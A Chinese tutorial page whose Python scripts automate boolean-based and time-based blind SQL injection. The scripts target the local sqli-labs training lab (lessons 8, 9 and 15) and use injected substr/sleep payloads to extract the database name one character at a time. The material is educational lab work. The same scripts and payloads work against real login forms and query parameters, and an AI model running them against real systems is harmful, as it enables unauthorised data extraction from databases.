当前位置: 首页 > article >正文

sqli-labs时间盲注、布尔盲注脚本

script.py:提供参数,用于调用布尔盲注或时间注入的函数
import time_type
import bool_type
​
​
# inject_type: 1.布尔盲注2.时间注入
# http_type:1.GET请求2.POST请求
# dict_para_data:所有的参数,和默认值
# vuln_para:注入的参数
# payloads:注入的内容
​
if __name__ == '__main__':
    # 时间注入POST测试
    dict_para_data = {
        'uname':'admin',
        'passwd':'123',
        'submit':'Submit'
    }
    vuln_para = 'uname'
    http_type = 2
    url = "http://127.0.0.1/sqli-labs/Less-15/"
    expected_time = 1
    payloads = [
        "admin' and if(substr(database(),",
        ",1)='",
        "',sleep(1),1) # "
    ]
    time_based.brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads)
time_based.py:遍历各个字符,并调用发送请求(GET/POST)函数
import req
​
​
# dict_para_data : 参数列表
# http_type : get还是post
# vuln_para : 易受攻击的参数
# payload : 收攻击参数的值
# url
# expected_time : 期待等待的时间
def send_payload_by_time(dict_para_data, http_type, vuln_para, payload, url, expected_time):
    # 时间盲注GET
    if http_type == 1:
        for tmp_para in dict_para_data.keys():
            if tmp_para ==  vuln_para:
                dict_para_data[tmp_para] = payload
                break
        return req.req_by_time_get(dict_para_data, url, expected_time)
    # 时间盲注POST
    if http_type == 2:
        # 替换掉注入的参数的数据为payload
        for tmp_para in dict_para_data.keys():
            if tmp_para ==  vuln_para:
                dict_para_data[tmp_para] = payload
                break
        # 返回判断的结果,预期结果为1,否则为0
        return req.req_by_time_post(dict_para_data, url, expected_time)
​
# dict_para_data : 参数列表
# vuln_para : 易受攻击的参数
# http_type : get还是post
# url
# expected_time : 期待等待的时间  
def brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads):
    print('[*] The Time-based blind injection is begin')
    brute_list1 = "0123456789abcdefghijklmnopqrstuvwxyz"
    brute_list2 = "123456789"
    result = ""
    # 遍历到字符串第tmp_int个字符
    for tmp_int in brute_list2:
        # 遍历的字符依次暴力枚举判断
        for tmp_char in brute_list1:
            payload = payloads[0] + tmp_int + payloads[1] + tmp_char + payloads[2]
            # 发送请求,并判断返回结果
            if send_payload_by_time(dict_para_data, http_type, vuln_para, payload, url, expected_time) == 1:
                result = result + tmp_char
                print(f"[*] The finding result: {result}")
    if result == "":
        print("[*] There is no finding result")
bool_based.py:遍历各个字符,并调用发送请求(GET/POST)函数
import req
​
​
# dict_para_data : 参数列表
# http_type : get还是post
# vuln_para : 易受攻击的参数
# payload : 收攻击参数的值
# url
# expected_data : 期待的返回结果 
def send_payload_by_bool(dict_para_data, http_type, inject_type, vuln_para, payload, url, expected_data):
    # 布尔盲注GET
    if http_type == 1:
        # 替换掉注入的参数的数据为payload
        for tmp_para in dict_para_data.keys():
            if tmp_para ==  vuln_para:
                dict_para_data[tmp_para] = payload
                break
        # 返回判断的结果,预期结果为1,否则为0
        return req.req_by_bool_get(dict_para_data, url, expected_data)
    # 布尔盲注POST
    if http_type == 2:
        for tmp_para in dict_para_data.keys():
            if tmp_para ==  vuln_para:
                dict_para_data[tmp_para] = payload
                break
        # 返回判断的结果,预期结果为1,否则为0
        return req.req_by_bool_post(dict_para_data, url, expected_data)
​
# dict_para_data : 参数列表
# vuln_para : 易受攻击的参数
# http_type : get还是post
# url
# expected_data : 期待的返回结果  
def brute_enum_by_bool(dict_para_data, vuln_para, http_type, inject_type, url, expected_data, payloads):
    print('[*] The Bool-based blind injection is begin')
    brute_list1 = "0123456789abcdefghijklmnopqrstuvwxyz"
    brute_list2 = "123456789"
    result = ""
    # 遍历到字符串第tmp_int个字符
    for tmp_int in brute_list2:
        # 遍历的字符依次暴力枚举判断
        for tmp_char in brute_list1:
            payload = payloads[0] + tmp_int + payloads[1] + tmp_char + payloads[2]
            # 返回的结果为真
            if send_payload_by_bool(dict_para_data, http_type, inject_type, vuln_para, payload, url, expected_data) == 1:
                result = result + tmp_char
                print(f"[*] The finding result: {result}")
    if result == "":
        print("[*] There is no finding result")
req.py:发送数据包并判断是否为预期结果,如果是则返回1,否则返回0
import requests
import time
# payload : 参数列表
# url
# expected_data : 期待的返回结果 
def req_by_bool_get(payload, url, expected_data):
    rep = requests.get(url, params=payload)
    if expected_data in rep.text:
        return 1
    else:
        return 0
​
def req_by_bool_post(payload, url, expected_data):
    rep = requests.post(url, data=payload)
    # print(rep.text)
    # print(payload)
    if expected_data in rep.text:
        return 1
    else:
        return 0
​
​
# payload : 参数列表
# url
# expected_time : 期待等待的时间长短 
def req_by_time_get(payload, url, expected_time):
    earlier = time.time()
    rep = requests.get(url, params=payload)
    latter = time.time()
    if latter - earlier >= expected_time:
        return 1
    else:
        return 0
        
def req_by_time_post(payload, url, expected_time):
    earlier = time.time()
    rep = requests.post(url, data=payload)
    latter = time.time()
    if latter - earlier >= expected_time:
        return 1
    else:
        return 0
测试1:布尔盲注GET请求
dict_para_data = {
        'id' : 'hack123'
    }
    vuln_para = 'id'
    http_type = 1
    inject_type = 1
    url = "http://127.0.0.1/sqli-labs/Less-8/"
    expected_data = 'are in'
    payloads = ["1' and substr(database()," , ",1)='" , "' and '1'='1"] 
    bool_based.brute_enum_by_bool(dict_para_data, vuln_para, http_type, inject_type, url, expected_data, payloads)
  
    
结果如下:

测试2:布尔盲注POST请求
# 布尔注入POST测试
    dict_para_data = {
        'uname':'admin',
        'passwd':'123',
        'submit':'Submit'
    }
    vuln_para = 'uname'
    http_type = 2
    inject_type = 1
    url = "http://127.0.0.1/sqli-labs/Less-15/"
    expected_data = 'flag.jpg'
    payloads = ["admin' and substr(database()," , ",1)='" , "' #"] 
    bool_based.brute_enum_by_bool(dict_para_data, vuln_para, http_type, inject_type, url, expected_data, payloads)

测试3:时间注入GET测试
    # 时间注入get测试
    dict_para_data = {
        'id': 'hack123'
    }
    vuln_para = 'id'
    http_type = 1
    url = "http://127.0.0.1/sqli-labs/Less-9/"
    expected_time = 1
    payloads = [
        "1' and if(substr(database(),",
        ",1)='",
        "',sleep(1),1) and '1'='1"
    ]
    time_based.brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads)

测试4:时间注入POST测试
    # 时间注入POST测试
    dict_para_data = {
        'uname':'admin',
        'passwd':'123',
        'submit':'Submit'
    }
    vuln_para = 'uname'
    http_type = 2
    url = "http://127.0.0.1/sqli-labs/Less-15/"
    expected_time = 1
    payloads = [
        "admin' and if(substr(database(),",
        ",1)='",
        "',sleep(1),1) # "
    ]
    time_based.brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads)


http://www.kler.cn/a/326707.html

相关文章:

  • IPD管理体系框架架应用实践
  • wordpress调用指定ID分类下浏览最多的内容
  • Redis 应用场景深度探索
  • 【再谈设计模式】享元模式~对象共享的优化妙手
  • Linux服务器centos7安装mysql
  • 重温设计模式--迭代器模式
  • 数据结构之链表(2),双向链表
  • 面试系列-携程暑期实习一面
  • C++ | Leetcode C++题解之第438题找到字符串中所有字母异位词
  • Python Web 应用中的 API 网关集成与优化
  • IText导出pdf不显示泰文
  • 438. 找到字符串中所有字母异位词
  • uniapp 知识点
  • 【前端样式】Sweetalert2简单用法
  • 如何使用ssm实现个人日常事务管理系统+vue
  • 金融教育宣传月 | 平安养老险百色中心支公司开展金融知识“消保县域行”宣传活动
  • 心理咨询预约管理系统(含源码+sql+视频导入教程)
  • web前端与koa框架node后端实现分片断点上传
  • xtu oj 六边形
  • 制造企业如何提升项目管理效率?惠科股份选择奥博思PowerProject项目管理系统
  • Windows环境Apache httpd 2.4 web服务器加载PHP8:Hello,world!
  • 【BurpSuite】访问控制漏洞和权限提升 | Access control vulnerabilities (3-6)
  • 一个静态ip可以提取出来多少ip
  • 新版pycharm如何导入自定义环境
  • elasticsearch_exporter启动报错 failed to fetch and decode node stats
  • C语言_回调函数和qsort